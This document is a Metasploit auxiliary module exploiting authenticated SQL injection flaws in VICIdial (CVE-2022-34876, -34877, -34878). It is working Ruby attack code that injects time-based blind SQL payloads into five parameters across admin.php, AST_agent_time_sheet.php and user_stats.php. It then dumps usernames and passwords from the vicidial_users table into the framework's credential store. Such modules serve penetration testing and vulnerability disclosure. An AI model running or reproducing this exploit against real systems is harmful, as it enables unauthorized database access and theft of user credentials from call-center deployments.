VICIdial Multiple Authenticated SQL Injection

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Scanner  
include Msf::Exploit::SQLi  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'VICIdial Multiple Authenticated SQLi',  
'Description' => %q{  
This module exploits several authenticated SQL Inject vulnerabilities in VICIdial 2.14b0.5 prior to  
svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable).  
Injection point 1 is on vicidial/admin.php when adding a user, in the modify_email_accounts parameter.  
Injection point 2 is on vicidial/admin.php when adding a user, in the access_recordings parameter.  
Injection point 3 is on vicidial/admin.php when adding a user, in the agentcall_email parameter.  
Injection point 4 is on vicidial/AST_agent_time_sheet.php when adding a user, in the agent parameter.  
Injection point 5 is on vicidial/user_stats.php when adding a user, in the file_download parameter.  
VICIdial does not encrypt passwords by default.  
},  
'Author' => [  
'h00die' # msf module, discovery  
],  
'License' => MSF_LICENSE,  
'References' => [  
[ 'URL', 'https://www.vicidial.org/VICIDIALforum/viewtopic.php?f=4&t=41300&sid=aacb27a29fefd85265b4d55fe51122af'],  
[ 'CVE', '2022-34876'], # admin.php  
[ 'CVE', '2022-34877'], # AST_agent_time_sheet.php  
[ 'CVE', '2022-34878'] # user_stats.php  
],  
'Actions' => [  
['List Users - modify_email_accounts method', { 'Description' => 'Queries username, password for COUNT users' }],  
['List Users - access_recordings method', { 'Description' => 'Queries username, password for COUNT users' }],  
['List Users - agentcall_email method', { 'Description' => 'Queries username, password for COUNT users' }],  
['List Users - agent_time_sheet method', { 'Description' => 'Queries username, password for COUNT users' }],  
['List Users - user_stats method', { 'Description' => 'Queries username, password for COUNT users' }],  
],  
'DefaultAction' => 'List Users',  
'DisclosureDate' => '2022-04-19',  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'SideEffects' => [IOC_IN_LOGS],  
'Reliability' => []  
}  
)  
)  
register_options [  
OptInt.new('COUNT', [false, 'Number of users to enumerate', 3]),  
OptString.new('USERNAME', [true, 'Valid Username for login', '6666']),  
OptString.new('PASSWORD', [true, 'Valid Password for login', '']),  
OptString.new('ACTION', [true, 'Valid Password for login', 'List Users - access_recordings method'])  
]  
end  
  
def post_4a  
{  
'ADD' => '4A',  
'custom_fields_modify' => '0',  
'user' => '111',  
'pass' => '111',  
'force_change_password' => 'N',  
'full_name' => '111',  
'user_level' => '1',  
'user_group' => 'ADMIN',  
'phone_login' => '111',  
'phone_pass' => '111',  
'active' => 'Y',  
'voicemail_id' => '',  
'email' => '',  
'mobile_number' => '',  
'user_code' => '',  
'user_location' => '',  
'territory' => '',  
'user_nickname' => '',  
'user_new_lead_limit' => '-1',  
'agent_choose_ingroups' => '1',  
'agent_choose_blended' => '1',  
'hotkeys_active' => '0',  
'scheduled_callbacks' => '1',  
'agentonly_callbacks' => '0',  
'next_dial_my_callbacks' => 'NOT_ACTIVE',  
'agentcall_manual' => '0',  
'manual_dial_filter' => 'DISABLED',  
'agentcall_email' => '0',  
'agentcall_chat' => '0',  
'vicidial_recording' => '1',  
'vicidial_transfers' => '1',  
'closer_default_blended' => '0',  
'user_choose_language' => '0',  
'selected_language' => 'defaultEnglish',  
'vicidial_recording_override' => 'DISABLED',  
'mute_recordings' => 'DISABLED',  
'alter_custdata_override' => 'NOT_ACTIVE',  
'alter_custphone_override' => 'NOT_ACTIVE',  
'agent_shift_enforcement_override' => 'DISABLED',  
'agent_call_log_view_override' => 'DISABLED',  
'hide_call_log_info' => 'DISABLED',  
'agent_lead_search' => 'NOT_ACTIVE',  
'lead_filter_id' => 'NONE',  
'user_hide_realtime' => '0',  
'allow_alerts' => '0',  
'preset_contact_search' => 'NOT_ACTIVE',  
'max_inbound_calls' => '0',  
'max_inbound_filter_enabled' => '0',  
'max_inbound_filter_min_sec' => '-1',  
'max_hopper_calls' => '0',  
'max_hopper_calls_hour' => '0',  
'wrapup_seconds_override' => '-1',  
'ready_max_logout' => '-1',  
'status_group_id' => '',  
'custom_one' => '',  
'custom_two' => '',  
'custom_three' => '',  
'custom_four' => '',  
'custom_five' => '',  
'qc_enabled' => '0',  
'qc_user_level' => '1',  
'qc_pass' => '0',  
'qc_finish' => '0',  
'qc_commit' => '0',  
'realtime_block_user_info' => '0',  
'admin_hide_lead_data' => '0',  
'admin_hide_phone_data' => '0',  
'ignore_group_on_search' => '0',  
'user_admin_redirect_url' => '',  
'view_reports' => '0',  
'access_recordings' => '0',  
'alter_agent_interface_options' => '0',  
'modify_users' => '0',  
'change_agent_campaign' => '0',  
'delete_users' => '0',  
'modify_usergroups' => '0',  
'delete_user_groups' => '0',  
'modify_lists' => '0',  
'delete_lists' => '0',  
'load_leads' => '0',  
'modify_leads' => '0',  
'export_gdpr_leads' => '0',  
'download_lists' => '0',  
'export_reports' => '0',  
'delete_from_dnc' => '0',  
'modify_campaigns' => '0',  
'campaign_detail' => '0',  
'delete_campaigns' => '0',  
'modify_ingroups' => '0',  
'delete_ingroups' => '0',  
'modify_inbound_dids' => '0',  
'delete_inbound_dids' => '0',  
'modify_custom_dialplans' => '0',  
'modify_remoteagents' => '0',  
'delete_remote_agents' => '0',  
'modify_scripts' => '0',  
'delete_scripts' => '0',  
'modify_filters' => '0',  
'delete_filters' => '0',  
'ast_admin_access' => '0',  
'ast_delete_phones' => '0',  
'modify_call_times' => '0',  
'delete_call_times' => '0',  
'modify_servers' => '0',  
'modify_shifts' => '0',  
'modify_phones' => '0',  
'modify_carriers' => '0',  
'modify_email_accounts' => '0',  
'vKik' => 'vKik',  
'modify_labels' => '0',  
'modify_colors' => '0',  
'modify_languages' => '0',  
'modify_statuses' => '0',  
'modify_voicemail' => '0',  
'modify_audiostore' => '0',  
'modify_moh' => '0',  
'modify_tts' => '0',  
'modify_contacts' => '0',  
'callcard_admin' => '0',  
'modify_auto_reports' => '0',  
'add_timeclock_log' => '0',  
'modify_timeclock_log' => '0',  
'delete_timeclock_log' => '0',  
'manager_shift_enforcement_override' => '0',  
'pause_code_approval' => '0',  
'admin_cf_show_hidden' => '0',  
'modify_ip_lists' => '0',  
'ignore_ip_list' => '0',  
'two_factor_override' => 'NOT_ACTIVE',  
'vdc_agent_api_access' => '0',  
'api_list_restrict' => '0',  
'api_allowed_functions[]' => 'ALL_FUNCTIONS',  
'api_only_user' => '0',  
'modify_same_user_level' => '1',  
'alter_admin_interface_options' => '1',  
'SUBMIT' => 'SUBMIT'  
}  
end  
  
def basic_auth  
user_pass = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"  
{  
'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"  
}  
end  
  
def inject_admin_page(param, payload)  
data = post_4a  
d = Rex::Text.rand_text_numeric(4)  
data[param] = "0' AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND '#{d}'='#{d}"  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'vicidial', 'admin.php'),  
'headers' => basic_auth,  
'vars_post' => data  
})  
  
fail_with Failure::Unreachable, 'Connection failed' unless res  
end  
  
def run_host(ip)  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'vicidial', 'admin.php'),  
'headers' => basic_auth  
})  
  
fail_with(Failure::Unreachable, 'Failed to load website') unless res  
fail_with(Failure::NoAccess, 'Invalid login/password') if res.code == 401  
@sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload|  
d = Rex::Text.rand_text_numeric(4)  
if datastore['ACTION'] == 'List Users - modify_email_accounts method'  
inject_admin_page('modify_email_accounts', payload)  
elsif datastore['ACTION'] == 'List Users - access_recordings method'  
inject_admin_page('access_recordings', payload)  
elsif datastore['ACTION'] == 'List Users - agentcall_email method'  
inject_admin_page('agentcall_email', payload)  
elsif datastore['ACTION'] == 'List Users - agent_time_sheet method'  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'vicidial', 'AST_agent_time_sheet.php'),  
'headers' => basic_auth,  
'vars_get' => {  
'agent' => "0' AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND '#{d}'='#{d}"  
}  
})  
elsif datastore['ACTION'] == 'List Users - user_stats method'  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'vicidial', 'user_stats.php'),  
'headers' => basic_auth,  
'vars_get' => {  
'DB' => '',  
'pause_code_rpt' => '',  
'park_rpt' => '1',  
'did_id' => '',  
'did' => '',  
'begin_date' => Date.today.to_s,  
'end_date' => Date.today.to_s,  
'user' => '',  
'submit' => 'submit',  
'search_archived_data' => '',  
'NVAuser' => '',  
'file_download' => "1' AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND '#{d}'='#{d}"  
}  
})  
end  
end  
  
unless @sqli.test_vulnerable  
print_bad("#{peer} - Testing of SQLi failed. If this is time based, try increasing SqliDelay.")  
return  
end  
columns = ['user', 'pass']  
  
print_status('Enumerating Usernames and Password Hashes')  
data = @sqli.dump_table_fields('vicidial_users', columns, '', datastore['COUNT'])  
  
table = Rex::Text::Table.new('Header' => 'vicidial_users', 'Indent' => 1, 'Columns' => columns)  
data.each do |user|  
create_credential({  
workspace_id: myworkspace_id,  
origin_type: :service,  
module_fullname: fullname,  
username: user[0],  
private_type: :password,  
private_data: user[1],  
service_name: 'VICIdial',  
address: ip,  
port: datastore['RPORT'],  
protocol: 'tcp',  
status: Metasploit::Model::Login::Status::UNTRIED  
})  
table << user  
end  
print_good('Dumped table contents:')  
print_line(table.to_s)  
end  
end  
`